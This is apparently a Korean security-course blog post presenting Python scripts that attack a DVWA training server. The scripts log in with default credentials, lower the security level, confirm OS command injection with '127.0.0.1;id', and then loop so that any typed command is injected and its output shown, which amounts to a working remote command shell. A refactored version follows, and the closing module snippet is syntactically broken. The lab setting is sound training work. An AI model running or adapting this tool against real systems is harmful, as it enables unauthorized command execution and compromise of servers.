정보보안 과정 Day 121 : 파이썬 공격코드 제작 실습2

 

 

 

 

target = DVWA 서버

 

 

Command injection.py

# (0) Module Import
import re
import os
import sys
import requests
from bs4 import BeautifulSoup

# (1) prepare : my banner msg /proxy / user-agent

banner_msg = '''
==================================================
      Remote Command Injection Program
            Written by t4kud4ddy
==================================================
'''
proxies = {'http': 'http://127.0.0.1:9000', 'https': 'https://127.0.0.1:9000'}
headers = {'user-agent': 'Mozilla/4.0 (compatible; MSIE 6.0; Linux 2.6.26-1-amd64) Lobo/0.98.3'}

# (2) Login info Gathering
# method = post
# url = http://192.168.10.134/dvwa/login.php
# data = username=admin&password=password&Login=Login
# ok_msg = 'Welcome to Damn Vulnerable Web App!'

login_url = "http://192.168.10.134/dvwa/login.php"
login_data = {'username': 'admin', 'password': 'password', 'Login': 'Login'}
login_msg = 'Welcome to Damn Vulnerable Web App!'

s = requests.Session()
req = s.post(login_url, data=login_data, proxies=proxies, headers=headers)
# print(req.text)
soup = BeautifulSoup(req.text, 'lxml')  # beautifulsoup에 넘길때는 바디부분(text)을 넘겨야 한다. html을 해석해준다. soup이라는 객체안에 넣는다
# print(soup.h1.sting)

# if re.search(login_msg, soup.h1.string):
if re.search(login_msg, str(soup.h1)):  # 특수기호가 들어있는 경우를 검색할 경우 str 으로 묶어주고 정규화된 표현식을 만들어서 검색해줘야함
    print("[  OK  ] Login Success!")
else:
    print('[ WARN ] Login Failed!')
    sys.exit(2)  # 1번은 가급적 사용하지 말자. 1번은 인자값 처리등의 아주 기본적인것 처리할때 쓴다. 2번부터!

# input()
# (3) Security Level
# method : prot
# url : 'http://192.168.10.134/dvwa/security.php'
# data : security=low&seclev_submit=Submit
# set_msg : 'Security level set to low'

sec_url = 'http://192.168.10.134/dvwa/security.php'
sec_data = {'security': 'low', 'seclev_submit': 'Submit'}
req = s.post(sec_url, data=sec_data, proxies=proxies, headers=headers)
# print(req.text)

soup = BeautifulSoup(req.text, 'lxml')
# print(soup.find_all('div', {'class', 'message'}))

sec_msg = 'Security level set to low'
if re.search(sec_msg, str(soup.find_all('div', {'class', 'message'}))):
    print("[  OK  ] Security level set to Low")
else:
    print("[ WARN ] Check the Security Level")
    sys.exit(3)

# (4) Command Injection Vulerable check
# method : post
# url : 'http://192.168.10.134/dvwa/vulnerabilities/exec/'
# data = ip=127.0.0.1%3Bwhoami&submit=submit
# check_cmd = 127.0.0.1;id
# ok_msg = 'www-data'

cmd_url = 'http://192.168.10.134/dvwa/vulnerabilities/exec/'
CMD = 'id'
vulncheck_cmd = '127.0.0.1;%s' % CMD
# print(vulncheck_cmd)
cmd_data = {'ip': vulncheck_cmd, 'submit': 'submit'}  # man ascii
# print(cmd_data)

req = s.post(cmd_url, data=cmd_data, headers=headers, proxies=proxies)
# print(req.text) #어느 태그에 들어있는지 있는지 출력결과에서 꼭 확인하자
soup = BeautifulSoup(req.text, 'lxml')
# print(soup.pre.string)

ok_msg = 'www-data'
if re.search(ok_msg, soup.pre.string):
    print("[  OK  ] Command Injection is Possible")
else:
    print("[ WARN ] Command Injection is not possible!")
    sys.exit(4)

# (5) Command Injection Attack
# 5-1) CMD : 명령어 계속 입력할 수 있도록 한다 / 무한 반복문

while True:
    CMD = input('[root@localhost ~]# : ')
    if CMD == 'quit':
        break  # 해당 반복문만 빠져나갈때 브레이크 씀
    vulncheck_cmd = '127.0.0.1;%s' % CMD
    cmd_data = {'ip': vulncheck_cmd, 'submit': 'submit'}
    # print(cmd_data); input()
    req = s.post(cmd_url, data=cmd_data, headers=headers, proxies=proxies)
    # print(req)
    soup = BeautifulSoup(req.text, 'lxml')
    # print(soup.pre.string)

    logfile = 'result.log'
    fd = open(logfile, 'w+')
    fd.write(soup.pre.string)
    fd.close()

    print("\n======== Command Output Begin =========")
    os.system("cat result.log | sed '1,8d'")
    print("-------- Command Output End ------------\n")

# 5-2) Result

 

 

함수화 시킨 버전

import re
import os
import sys
import requests
from bs4 import BeautifulSoup

proxies = {'http': 'http://127.0.0.1:9000', 'https': 'https://127.0.0.1:9000'}
headers = {'user-agent': 'Mozilla/4.0 (compatible; MSIE 6.0; Linux 2.6.26-1-amd64) Lobo/0.98.3'}
login_url = "http://192.168.10.134/dvwa/login.php"
login_data = {'username': 'admin', 'password': 'password', 'Login': 'Login'}
login_msg = 'Welcome to Damn Vulnerable Web App!'

# Banner Message
banner_msg = """
==================================
Remote Command Injection Program 
            Written by t4kud4ddy
==================================
"""

# Proxy & User-Agent
proxies = {'http': 'http://127.0.0.1:9000', 'https': 'https://127.0.0.1:9000'}
headers = {'user-agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0'}

# Remote Command Injection Procedure
# 1) Login
# 2) Security Level
# 3) Command Injection vulnerable check
# 4) Command Injection Attack

# 1) Login
# Method: POST
# * url: http://192.168.10.134/dvwa/login.php
# * data: username=admin&password=password&Login=Login
# * ok_mess: 'Welcome to Damn Vulnerable Web App'
login_url = 'http://192.168.10.134/dvwa/login.php'
login_data = {'username': 'admin', 'password': 'password', 'Login': 'Login'}
ok_mess_for_login = 'Welcome to Damn Vulnerable Web App'

s = requests.Session()
def dvwa_login_ok(sess, url, data, headers, proxies, mess):
    r = sess.post(url, data=data, headers=headers, proxies=proxies)
    soup = BeautifulSoup(r.text, 'lxml')
    if re.search(mess, soup.h1.string):
        print('[  OK  ] Login success.')
        retvalue = True
    else:
        print('[ WARN ] Login failed.')
        retvalue = False

    return retvalue

if dvwa_login_ok(s, login_url, login_data, headers, proxies, ok_mess_for_login) is False:
    sys.exit(2)


# 2) Security Level
# Method: POST
# * url: 'http://192.168.10.134/dvwa/security.php'
# * data: security=low&seclev_submit=Submit
# * ok_mess: 'Security level set to low'
security_url = 'http://192.168.10.134/dvwa/security.php'
security_data = {'security': 'low', 'seclev_submit': 'Submit'}
ok_mess_for_security = 'Security level set to low'

def dvwa_securitylevel_ok(sess, url, data, headers, proxies, mess):
    r = sess.post(url, data=data, headers=headers, proxies=proxies)
    soup = BeautifulSoup(r.text, 'lxml')
    if re.search(mess, str(soup.find_all('div', {'class', 'message'}))):
        print('[  OK  ] Security level set to low.')
        retvalue = True
    else:
        print('[ WARN ] Security level is not set')
        retvalue = False

    return retvalue

if dvwa_securitylevel_ok(s, security_url, security_data, headers, proxies, ok_mess_for_security) is False:
    sys.exit(4)


# 3) Command Injection vulnerable check
# Method: POST
# * url: 'http://192.168.10.134/dvwa/vulnerabilities/exec/'
# * data: ip=127.0.0.1%3Bid&submit=submit
# * ok_mess: 'www-data'
command_url = 'http://192.168.10.134/dvwa/vulnerabilities/exec/'
CMD = 'id'
vulnerable_check = '127.0.0.1;%s' % CMD
command_data = {'ip': vulnerable_check, 'submit': 'submit'}
ok_mess_for_command = 'www-data'

resp = s.post(command_url, data=command_data, headers=headers, proxies=proxies)
# print(resp.text)
soup = BeautifulSoup(resp.text, 'lxml')
# print(soup.pre.string)
if re.search(ok_mess_for_command, soup.pre.string):
    print('[  OK  ] Command Injection is possible.')
else:
    print('[ WARN ] Command Injection not possible.')
    sys.exit(4)

# 4) Command Injection Attack
# 4-1) CMD
# 4-2) Result

while True:
    CMD = input('[root@localhost ~]# ')
    if CMD == 'quit':
        break
    vulnerable_check = '127.0.0.1;%s' % CMD
    command_data = {'ip': vulnerable_check, 'submit': 'submit'}
    # print(command_data)
    resp = s.post(command_url, data=command_data, headers=headers, proxies=proxies)
    soup = BeautifulSoup(resp.text, 'lxml')
    # print(soup.pre.string)

    logfile = 'result.log'
    fd = open(logfile, 'w+')
    fd.write(soup.pre.string)
    fd.close()

    # print("\n------ Command Output -------")
    os.system("cat result.log | sed '1,8d'")
    # print("\n------ Command Output -------")

 

 

모듈 불러와 쓸때

import X
import sys
import requests
from bs4 import BeautifulSoup

proxies = {'http': 'http://127.0.0.1:9000', 'https': 'https://127.0.0.1:9000'}
headers = {'user-agent': 'Mozilla/4.0 (compatible; MSIE 6.0; Linux 2.6.26-1-amd64) Lobo/0.98.3'}
login_url = "http://192.168.10.134/dvwa/login.php"
login_data = {'username': 'admin', 'password': 'password', 'Login': 'Login'}
login_msg = 'Welcome to Damn Vulnerable Web App!'

s = requests.Session()
if X.dvwa_login_ok(session, url, data, headers, proxies, msg) == false
    sys.exit(2)